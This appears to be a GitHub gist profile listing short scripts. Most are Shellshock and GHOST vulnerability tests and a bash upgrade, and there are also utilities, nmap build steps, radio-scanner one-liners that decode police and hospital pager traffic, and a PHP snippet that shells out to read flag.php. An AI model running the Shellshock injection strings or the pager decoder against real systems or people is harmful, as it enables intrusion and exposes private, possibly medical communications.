Skip to content

Instantly share code, notes, and snippets.

View sgviking's full-sized avatar

Dan Daggett sgviking

18 followers · 26 following
View GitHub Profile
@sgviking
sgviking / shellshock_poc.md
Last active October 29, 2020 11:05
PoC for 6 shellshock CVE's

shellshock PoC/test code

CVE-2014-6271

env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id

CVE-2014-7169

# will create a file named echo in cwd with date in it, if vulnerable
env X='() { (a)=>\' bash -c "echo date"; cat echo

@sgviking
sgviking / bashup_manual.sh
Last active August 29, 2015 14:07
#!/usr/bin/env bash
# upgrade bash (from source) to
# GNU bash, version 4.3.27(1)-release (x86_64-unknown-linux-gnu)
# POC code: https://gist.github.com/sgviking/99f51a73665d8e52f50b
mkdir bash-src
cd bash-src
# download/verify bash source
@sgviking
sgviking / ghost_check
Last active August 29, 2015 14:14
GHOST CVE-2015-0235 vulnerability check
# Taken from vulnerability report for CVE-2015-0235
# http://www.openwall.com/lists/oss-security/2015/01/27/9
cat > GHOST.c << EOF
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
@sgviking
sgviking / env2json
Created May 18, 2015 00:50
Read in environmental variables with env command and output the environmental variables as a JSON string. This was build to be used in a minimal Docker environment with only shell scripting access.
#!/usr/bin/env bash
# To use this with sed the output string needs to be escaped like so:
# ./env2json | sed -e 's/[]\/$*.^|[]/\\&/g'
# Here is an example:
# sed -e "s/{PLACEHOLDER}/$(./env2json | sed -e 's/[]\/$*.^|[]/\\&/g')/" test.conf
# http://www.linuxjournal.com/content/bash-associative-arrays
# http://stackoverflow.com/questions/3112687/how-to-iterate-over-associative-array-in-bash
# http://stackoverflow.com/questions/9449417/how-do-i-assign-the-output-of-a-command-into-an-array
@sgviking
sgviking / onelink.sh
Last active July 26, 2024 11:50
Script for Lenevo Carbon X1 gen 2 to prepare for docking and undocking from One Link Pro Dock
@sgviking
sgviking / police.sh
Created November 14, 2015 07:13
#!/usr/bin/env bash
rtl_fm -M fm -f 460.557M -f 460.432M -f 453.588M -f 460.188M -s 12k -g 50 -l 70 | play -r 12k -t raw -e s -b 16 -c 1 -V1 -
@sgviking
sgviking / hospital_pager.sh
Created November 14, 2015 07:14
#!/usr/bin/env bash
rtl_fm -M fm -f 163.228M -s 22050 -g 100 -l 310 | multimon-ng -t raw -a POCSAG1200 -f alpha /dev/stdin
@sgviking
sgviking / fm.sh
Last active November 14, 2015 07:15
#!/usr/bin/env bash
# Usage: ./fm.sh 98.3
rtl_fm -M fm -s 200k -A fast -r 48k -f $1M | play -r 48k -t raw -e s -b 16 -c 1 -V1 -
@sgviking
sgviking / static_nmap.md
Last active September 9, 2016 03:26
static nmap 
git clone https://github.com/andrew-d/static-binaries
cd static-binaries/nmap
docker build -t staticnmap .
docker run -v $(pwd):/output staticnmap  # take a nap
cd linux/x86_64
./nmap 127.0.0.1
@sgviking
sgviking / mfw.php
Created September 18, 2016 04:44
<?php
passthru("cat flag.php");
?>